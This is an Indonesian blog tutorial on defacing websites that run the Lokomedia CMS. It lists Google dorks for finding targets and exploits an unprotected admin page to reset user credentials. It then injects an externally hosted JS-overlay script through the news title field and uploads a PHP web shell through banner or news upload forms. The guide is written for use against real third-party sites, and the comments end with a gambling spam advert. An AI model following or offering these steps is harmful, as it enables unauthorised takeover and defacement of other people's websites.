Home » , » Deface Lokomedia Dengan JS Overlay Dan Shell

Deface Lokomedia Dengan JS Overlay Dan Shell

Deface Lokomedia Dengan JS Overlay Dan Shell - Deface : Teknik ini merupakan Teknik Perbaduan dari Teknik Js Overlay dan Bug Lokomedia.

Dork  Lokomedia
inurl:/media.php?module=berita
inurl:/admin/foto_berita
inurl:/admin/content.php?module=user
inurl:/adminweb/






  • Langsung saja Kita Exploit LOKOMEDIA
1.Search Google Pakai Dork Diatas

2. Kalo ketemu langsung aja ke exploit
http://site/admin/content.php?module=user

3. Kalo Muncul Kaya begini
[Image: 2rnddll.png]

berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita

4. Langsung aja Klik Pilihan Edit
nanti akan jadi kayak gini
[Image: 2mnnjn8.png]
Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..

5. Kalo udah muncul kayak gini, terus di gmana'in ?
[Image: wj7whl.jpg]
Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell
  • Saat nya kita masuk Ke JS OVERLAY
Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell

terus buat file misalkan devilscream.js
lalu isikan Script berikut

http://newbie-security.or.id/code/js-overlay.txt


Nah, biar Web Lokomedianya ke deface gmana?

Pada CMS Lokomedia masuk ke Menu Berita.
Kalo gak ada pilihan menu berita langsung ke URL

http://site/admin/media.php?module=berita

Kalo kagak bisa yah kagak bisa Dodgy

Lalu klik Add New Berita


  • Pada Bagian judul masukan Script berikut :
Code:
http://situs-anda-menyimpan-file-js-overlay/devilscream.js


Isi atau lainnya gak usah di isi gak apa-apa

Setelah itu save, percuma kalo gak di save Dodgy

Tanem Shell

Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
kalo gak bisa juga yah emang nasib Dodgy

Atau gak cari Menu yang bisa upload file
[Image: 10i9nrp.jpg]

Setelah itu Klik AddNews

Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..

[Image: 2ikwcya.jpg]


Setelah di Upload masukin URL kaya gini
http://site/admin/foto_berita/nama_shell.php

kalau misalkan anda bukan di banner uploadnya
biasanya berada di http://site/files/nama_shell.php

Nah setelah itu Oprek deh Websitenya


Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool

Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin

Sekian dan terima kasih...


Thanks ISD and Newbie- security

2 komentar:

  1. Hallo Semuanya, aku ada game Recomendasi nih yaitu game Poker GT. Game ini sama dengan Game poker lainya loh hanya disini bedanya kita bisa ketemu dengan pemain real/nyata didalamnya. Dan banyak bonus nya loh dan Hadiah menarik di dalam nya seperti ada leptop, Notebook,Vocer Pulsa dan Masih banyak yang lainnya. Buruan gabung sama kita di pokergt.com dengan deposit 10rp loh.
    jangan sampai kentingalan yah !!! (www.pokergt.com)

    BalasHapus